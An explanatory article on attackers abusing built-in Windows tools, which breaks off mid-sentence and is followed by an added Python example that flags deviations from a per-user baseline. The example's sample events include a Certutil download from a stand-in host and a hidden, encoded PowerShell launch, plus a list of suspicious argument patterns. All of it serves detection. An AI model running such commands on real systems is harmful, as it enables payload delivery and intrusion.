Living-off-the-land attacks exploit legitimate system administration tools that most security teams overlook because they trust them. Threat actors increasingly use built-in Windows utilities like PowerShell, WMIC, netsh, Certutil, and MSBuild to move laterally, establish persistence, and exfiltrate data without triggering traditional malware defenses.
Bitdefender's research demonstrates that monitoring these trusted tools over 45 days reveals the true attack surface within organizations. The analysis shows that legitimate administrative activity and malicious activity often look identical to conventional detection systems. This creates a fundamental blind spot: security teams struggle to distinguish between an IT administrator running PowerShell scripts and an attacker using the same tool to harvest credentials or deploy backdoors.
The threat model has shifted. Modern adversaries avoid deploying obvious malware payloads because endpoint protection catches them quickly. Instead, they abuse the trust placed in native Windows utilities. PowerShell alone offers command-line access, script execution, and network communication capabilities that rival dedicated penetration testing frameworks. Certutil handles certificate operations but also downloads and encodes files. MSBuild compiles projects but also executes arbitrary code. These tools carry legitimate purposes, making rule-based blocking problematic and signature-based detection ineffective.
Organizations face a practical challenge: elevated privileges required for legitimate administration become the same privileges attackers need for lateral movement. The 45-day observation window reveals that attack surface visibility requires behavioral analysis rather than tool blacklisting. Monitoring execution context, parent processes, command-line arguments, and network connections separates suspicious PowerShell activity from routine patch management.
Detection strategies must shift toward anomaly-based approaches. Baselining normal administrative behavior across teams and departments allows security operations centers to flag deviations. A developer running Certutil during off-hours warrants investigation. An IT administrator running unusual MSBuild commands
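The baselining approach described above, worked through as an added example (my own illustration, not Bitdefender's tooling or data): a small triage routine that scores constructed Sysmon-style process-creation events against a per-account baseline, business hours, parent process, and command-line arguments. The field names, the baseline table, and the business-hours window are assumptions chosen for the illustration.

```python
from datetime import datetime

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
EVENTS = [
    {"ts": "2024-03-04T10:15:00", "user": "it-admin1", "image": "powershell.exe",
     "parent": "explorer.exe", "cmd": "powershell.exe -File C:\\patches\\apply.ps1"},
    {"ts": "2024-03-04T02:40:00", "user": "dev-jane", "image": "certutil.exe",
     "parent": "cmd.exe", "cmd": "certutil.exe -urlcache -split -f http://example.invalid/x out.txt"},
    {"ts": "2024-03-04T11:05:00", "user": "sales-bob", "image": "powershell.exe",
     "parent": "winword.exe", "cmd": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"ts": "2024-03-04T14:20:00", "user": "it-admin1", "image": "msbuild.exe",
     "parent": "devenv.exe", "cmd": "msbuild.exe C:\\src\\app\\app.csproj"},
]

# Assumed baseline learned from the observation window: which native tools each account normally runs.
BASELINE = {"it-admin1": {"powershell.exe", "msbuild.exe"}, "dev-jane": {"msbuild.exe"}}
BUSINESS_HOURS = range(8, 18)                    # assumed 08:00-17:59 local time
DOC_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SUSPICIOUS_ARGS = {                              # tool -> argument fragments worth analyst attention
    "certutil.exe": ("-urlcache", "-decode", "-encode"),
    "powershell.exe": ("-enc", "-encodedcommand", "-w hidden", "-nop"),
    "msbuild.exe": ("\\temp\\", "\\appdata\\"),
}

def triage(event, baseline=BASELINE):
    """Return the list of reasons this process-creation event deviates from baseline."""
    reasons = []
    user, image, parent = event["user"], event["image"].lower(), event["parent"].lower()
    cmd = event["cmd"].lower()
    if image not in baseline.get(user, set()):        # execution context: who runs what
        reasons.append("tool outside user baseline")
    if datetime.fromisoformat(event["ts"]).hour not in BUSINESS_HOURS:
        reasons.append("off-hours execution")
    if parent in DOC_PARENTS:                          # parent process: document handler spawning a tool
        reasons.append("spawned by document-handling parent")
    hits = [a for a in SUSPICIOUS_ARGS.get(image, ()) if a in cmd]
    if hits:                                           # command-line arguments
        reasons.append("suspicious arguments: " + ", ".join(hits))
    return reasons

def flagged(events=EVENTS):
    """Events that deviate from baseline, with their reasons, queued for analyst review."""
    return [(e["user"], e["image"], triage(e)) for e in events if triage(e)]

if __name__ == "__main__":
    for user, image, reasons in flagged():
        print(f"{user:10} {image:15} {'; '.join(reasons)}")
```

The routine-patching PowerShell run and the MSBuild build launched from Visual Studio produce no findings, while the off-hours Certutil download and the Word-spawned encoded PowerShell each accumulate several independent reasons, which is the signal a rule-based allow/deny list on the tool name alone cannot provide.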
